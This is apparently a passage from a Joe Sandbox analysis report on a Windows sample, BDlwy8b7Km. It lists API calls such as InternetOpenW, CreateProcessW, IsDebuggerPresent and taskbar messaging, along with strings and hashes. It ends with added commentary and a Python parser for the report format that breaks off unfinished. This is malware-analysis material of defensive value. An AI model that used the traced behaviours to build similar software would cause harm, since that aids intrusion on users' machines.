• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 005D33A2
  • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00593A04
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_wcslen
• String ID: Line:
• API String ID: 2289894680-1585850449
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0062327C
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00623287
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
                                                  APIs
                                                    • Part of subcall function 0059600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0059604C
                                                    • Part of subcall function 0059600E: GetStockObject.GDI32(00000011), ref: 00596060
                                                    • Part of subcall function 0059600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0059606A
                                                  • GetWindowRect.USER32(00000000,?), ref: 0062377A
                                                  • GetSysColor.USER32(00000012), ref: 00623794
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                  • String ID: static
                                                  • API String ID: 1983116058-2160076837
                                                  • Opcode ID: edbf8c04b76e2c170d90ca146299a0d0094ceb68dba1a8ae88b214a9d1a732c1
                                                  • Instruction ID: b1d60ab17641907753b4a552cde2fc101dc95df35ffdf2affeefd597a9a29e42
                                                  • Opcode Fuzzy Hash: edbf8c04b76e2c170d90ca146299a0d0094ceb68dba1a8ae88b214a9d1a732c1
                                                  • Instruction Fuzzy Hash: 1A1159B261061AAFDF00DFA8DC45AEE7BBAFB08314F004514F955E3250E774E8219B50
                                                  APIs
                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0060CD7D
                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0060CDA6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Internet$OpenOption
                                                  • String ID: <local>
                                                  • API String ID: 942729171-4266983199
                                                  • Opcode ID: b736b605037fbbc4927110505ed8d79a18ecea4ca8698744906509bae6ad7e4c
                                                  • Instruction ID: 45f78b564bcb623cd9ef86504cec9176fb4d67920606ce46646be75a66eb710a
                                                  • Opcode Fuzzy Hash: b736b605037fbbc4927110505ed8d79a18ecea4ca8698744906509bae6ad7e4c
                                                  • Instruction Fuzzy Hash: F611A071295631BAD7384B668C49EE7BEAAEF527B4F00432AB109831C0E6609845D6F0
                                                  APIs
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 006234AB
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006234BA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LengthMessageSendTextWindow
                                                  • String ID: edit
                                                  • API String ID: 2978978980-2167791130
                                                  • Opcode ID: 1bf8838f6121b4cd24ae270a84bf42d5f9224357f963d0753046d641d7ac017d
                                                  • Instruction ID: 95a64064fc8ec55abdeb81b3c6d51a172418091e417ca63b2f938c04567a1ae3
                                                  • Opcode Fuzzy Hash: 1bf8838f6121b4cd24ae270a84bf42d5f9224357f963d0753046d641d7ac017d
                                                  • Instruction Fuzzy Hash: 64119D71500929AAEB216E64EC44AEA3BABEB05374F504364FA60973D0C779DC529F60
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • CharUpperBuffW.USER32(?,?,?), ref: 005F6CB6
                                                  • _wcslen.LIBCMT ref: 005F6CC2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$BuffCharUpper
                                                  • String ID: STOP
                                                  • API String ID: 1256254125-2411985666
                                                  • Opcode ID: 3cbd7216e3319e65051b9471920d38e7e4d1617a3f29349dcae1bde6e094d347
                                                  • Instruction ID: 80299e0d6b384413ef6b3f49736be85a6c44af639550376db5524884425746ff
                                                  • Opcode Fuzzy Hash: 3cbd7216e3319e65051b9471920d38e7e4d1617a3f29349dcae1bde6e094d347
                                                  • Instruction Fuzzy Hash: 4701C43261052B9ACB209FBDDC859BF7FB5FBA1710B500928E9A2D7195EA39DD00C650
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                    • Part of subcall function 005F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 005F3CCA
                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 005F1C46
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_wcslen
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 624084870-1403004172
                                                  • Opcode ID: 403c211ce14deb09934e8b6ec80ee98f92ff6290d5604da3361f409f31129296
                                                  • Instruction ID: e0cff0807532de5fd3ee6469e0531391caee06c4b206f8120acf75e4177a04be
                                                  • Opcode Fuzzy Hash: 403c211ce14deb09934e8b6ec80ee98f92ff6290d5604da3361f409f31129296
                                                  • Instruction Fuzzy Hash: 6F01F77168010DA6CF04EB94CE699FF7BA8BF51340F10001EAA1673281EA289E0CC6B5
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                    • Part of subcall function 005F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 005F3CCA
                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 005F1CC8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_wcslen
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 624084870-1403004172
                                                  • Opcode ID: 547ca72d4bb3492a03919ed04540739b1a87b3743ff5a2f28cb504a8fd9a5d0e
                                                  • Instruction ID: b8153a770a80c8486d34d629d69fb14218304d9742bb78bb2195f6ec9d8d370e
                                                  • Opcode Fuzzy Hash: 547ca72d4bb3492a03919ed04540739b1a87b3743ff5a2f28cb504a8fd9a5d0e
                                                  • Instruction Fuzzy Hash: B301DB71A4051DA7DF14EB95CE1AAFE7FACBF51380F140019B91273281EA299F08C675
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 005AA529
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_footer_wcslen
                                                  • String ID: ,%f$3y^
                                                  • API String ID: 2551934079-2939242258
                                                  • Opcode ID: aa6d5d56ab44998d869bf8cb03c5bbfcc36dfa1c608193d1899738b7947df62b
                                                  • Instruction ID: 34bc85c96eb5264e067318c075484caf58bd6bb9e843933bbcb55a7766ccfc98
                                                  • Opcode Fuzzy Hash: aa6d5d56ab44998d869bf8cb03c5bbfcc36dfa1c608193d1899738b7947df62b
                                                  • Instruction Fuzzy Hash: CB012B31B01A124BCE14F76CDC2FAAD7F59BB8A710F401429F512571C2EF50AD01C69B
                                                  APIs
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00663018,0066305C), ref: 006281BF
                                                  • CloseHandle.KERNEL32 ref: 006281D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: \0f
                                                  • API String ID: 3712363035-3782278232
                                                  • Opcode ID: 9880aa6a90b0d20ea5e8bda0d21a0439a5cd5f61d8e0c4b02f09faec43654b9a
                                                  • Instruction ID: e108d7f48ead5d43027da91940f53babd68604d5af75b502e13d963800650df0
                                                  • Opcode Fuzzy Hash: 9880aa6a90b0d20ea5e8bda0d21a0439a5cd5f61d8e0c4b02f09faec43654b9a
                                                  • Instruction Fuzzy Hash: 8BF089B1640721BEE3206B656C49FBB3E5EEB04764F001420FB08D52A2D6B59E1487F8
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: 3, 3, 16, 1
                                                  • API String ID: 176396367-3042988571
                                                  • Opcode ID: f1f65e91ac26899d436e79e80601029a21445996f9872884650924f2b2174994
                                                  • Instruction ID: 9afd7916a7a87e7107760aa8fbbaa4d865e5a81ff1ff3d20537856f997259d26
                                                  • Opcode Fuzzy Hash: f1f65e91ac26899d436e79e80601029a21445996f9872884650924f2b2174994
                                                  • Instruction Fuzzy Hash: F0E02B022042211093311279ACC59FF5ADBDFC97A1718182BF981C2367EA949DD193A0
                                                  APIs
                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 005F0B23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Message
                                                  • String ID: AutoIt$Error allocating memory.
                                                  • API String ID: 2030045667-4017498283
                                                  • Opcode ID: 03b33a82023abe7c4d7aba4962e53a2b7075413c587b93c7e35b11d5d552e761
                                                  • Instruction ID: 756945a491b015eeb2ee57f9c7a5b9ef21aa1ee8e17e844b71bcb7252339c11b
                                                  • Opcode Fuzzy Hash: 03b33a82023abe7c4d7aba4962e53a2b7075413c587b93c7e35b11d5d552e761
                                                  • Instruction Fuzzy Hash: DDE0D83124471926D22437947C0BFCD7EC9AF05B65F100426FB48554C38AE264900AEA
                                                  APIs
                                                    • Part of subcall function 005AF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,005B0D71,?,?,?,0059100A), ref: 005AF7CE
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,0059100A), ref: 005B0D75
                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0059100A), ref: 005B0D84
                                                  Strings
                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 005B0D7F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                  • API String ID: 55579361-631824599
                                                  • Opcode ID: 747434c0f708576bae3b4b98cf303e874e97834cf6f2620b5fe8761b5eb6b778
                                                  • Instruction ID: a74cd3897d128a138d9b65661f01b3e5490de83ec7a7949271f87f36ab37e617
                                                  • Opcode Fuzzy Hash: 747434c0f708576bae3b4b98cf303e874e97834cf6f2620b5fe8761b5eb6b778
                                                  • Instruction Fuzzy Hash: A2E03970200B118FD7309FA8E4083967FE1BB00744F01592DE482C66A1DBB1E4458B91
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 005AE3D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_footer
                                                  • String ID: 0%f$8%f
                                                  • API String ID: 1385522511-1024914575
                                                  • Opcode ID: 73bf765b08976110d30de336258566b6578e2db9124e581fd1f5430cad22d91a
                                                  • Instruction ID: e8499c8be656e4461019df547e4380db14850bcb31236055001ea5960811fdeb
                                                  • Opcode Fuzzy Hash: 73bf765b08976110d30de336258566b6578e2db9124e581fd1f5430cad22d91a
                                                  • Instruction Fuzzy Hash: BDE08631414D12CBCF249B1CF8BAA8D3B57BB46320B502977E113871D1BB703C418655
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: %.3d$X64
                                                  • API String ID: 481472006-1077770165
                                                  • Opcode ID: 52d89993d8c71815247e024a3a10b4e82c9430e9b7fbb67ac166cb00b5ca3816
                                                  • Instruction ID: 9c915665acc56e1bda11dc0c655e14ca7d344d4649c160493319945c4f7ac61c
                                                  • Opcode Fuzzy Hash: 52d89993d8c71815247e024a3a10b4e82c9430e9b7fbb67ac166cb00b5ca3816
                                                  • Instruction Fuzzy Hash: 42D01265C09149E9CB9496E1DC498BDBB7CBB19341F508852FE56A1040E634C5086771
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0062236C
                                                  • PostMessageW.USER32(00000000), ref: 00622373
                                                    • Part of subcall function 005FE97B: Sleep.KERNEL32 ref: 005FE9F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: 167c2429b66275e26fb31f92fb51defd816f2966475b8af279dc2e7918467207
                                                  • Instruction ID: 124ee3df2e6cdaee00c39b395c58a7dec0cd7aa39135fd508a7c7630df96400f
                                                  • Opcode Fuzzy Hash: 167c2429b66275e26fb31f92fb51defd816f2966475b8af279dc2e7918467207
                                                  • Instruction Fuzzy Hash: 0DD0C932381B14BAE674A770DC0FFCA6A16AB44B21F415A167745AA1E0C9F4A806CA54
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0062232C
                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0062233F
                                                    • Part of subcall function 005FE97B: Sleep.KERNEL32 ref: 005FE9F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: 6e9598e881ef4df1aba474305e650a31a894e63d2afd3537857235c7df12ed59
                                                  • Instruction ID: 4b0b6d2ac3b79391ba57d5738bda051152111f82eda50b719de37f5a863985a2
                                                  • Opcode Fuzzy Hash: 6e9598e881ef4df1aba474305e650a31a894e63d2afd3537857235c7df12ed59
                                                  • Instruction Fuzzy Hash: A7D02232380B00B7E374B730DC0FFCE7A06AB00B20F004A027705AA0E0C8F0A802CA10
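The two records above share the same API pattern: FindWindowW locates the taskbar window (class Shell_TrayWnd) and PostMessageW sends it a message, with a Sleep in a subcall. Reading the arguments out of the report text by hand is error-prone, so here is an added example (not part of the Joe Sandbox report and not the sample's own code) that parses API lines in this report's own format, decodes the PostMessageW parameters, and pairs each Shell_TrayWnd lookup with the PostMessageW that follows it. The sample input is a constructed copy of the six API lines from these two records. The only constant assumed from outside the report is WM_COMMAND = 0x0111 from the Windows SDK; the wParam 0x197 (407) is a taskbar command ID the report does not name, so the example reports it as a number rather than guessing its meaning. Note that Joe Sandbox prints only the arguments it resolved, which is why the first PostMessageW shows a single argument; the decoder has to tolerate that.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: the API lines of the two Shell_TrayWnd records in this
# report, copied in the report's own layout (bullet, call, optional args, ref).
SAMPLE_API_LINES = """\
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0062236C
• PostMessageW.USER32(00000000), ref: 00622373
  • Part of subcall function 005FE97B: Sleep.KERNEL32 ref: 005FE9F3
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0062232C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0062233F
  • Part of subcall function 005FE97B: Sleep.KERNEL32 ref: 005FE9F3
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix,
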